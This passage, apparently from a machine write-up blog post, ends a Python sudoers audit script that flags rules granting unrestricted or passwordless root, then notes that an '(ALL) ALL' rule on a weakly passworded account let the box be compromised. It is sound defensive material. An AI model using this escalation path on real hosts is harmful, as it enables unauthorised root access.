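        specs.append({"who": m.group("who"), "host": m.group("host"),
                      "runas": (m.group("runas") or "root").strip(),
                      "tags": tags, "commands": commands})
    return specs


def parse_sudo_l(output: str, who: str) -> list[dict]:
    """Same record shape from the entry lines of `sudo -l` output, i.e. the
    lines after 'may run the following commands on this host:'."""
    specs, in_entries = [], False
    for line in output.splitlines():
        if "may run the following commands" in line:
            in_entries = True
            continue
        m = _SUDO_L_RE.match(line) if in_entries else None
        if m:
            tags, commands = _split_tags(m.group("cmds").strip())
            specs.append({"who": who, "host": "this host",
                          "runas": m.group("runas").strip(),
                          "tags": tags, "commands": commands})
    return specs


def audit(specs: list[dict]) -> list[str]:
    """Flag rules that hand out unrestricted or passwordless root."""
    findings = []
    for s in specs:
        if s["who"] == "root":
            continue
        runas_user = s["runas"].split(":", 1)[0].strip()
        if runas_user not in ("ALL", "root"):
            continue
        if "ALL" in s["commands"]:
            findings.append(f"{s['who']}: can run ALL commands as root")
        elif "NOPASSWD" in s["tags"]:
            findings.append(f"{s['who']}: NOPASSWD root for {', '.join(s['commands'])}")
    return findings


# Constructed samples; the sudo -l text mirrors the format shown above.
SAMPLE_SUDOERS = """\
Defaults env_reset
root    ALL=(ALL:ALL) ALL
patrick ALL=(ALL) ALL
%admin  ALL=(ALL) NOPASSWD: /usr/bin/apt-get update, /usr/bin/systemctl restart apache2
backup  ALL=(backup) /usr/bin/rsync
"""
SAMPLE_SUDO_L = """\
User patrick may run the following commands on this host:
    (ALL) ALL
"""

if __name__ == "__main__":
    for finding in audit(parse_sudoers(SAMPLE_SUDOERS)) + audit(parse_sudo_l(SAMPLE_SUDO_L, "patrick")):
        print(finding)
```

The combination that made this box fall is the one the audit is built to catch: an (ALL) ALL rule on an account whose password is guessable turns any credential reuse into a full host compromise, so such rules belong only on accounts with strong, unique credentials, or better, are replaced with the specific commands the role actually needs.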
This post is licensed under CC BY 4.0 by the author.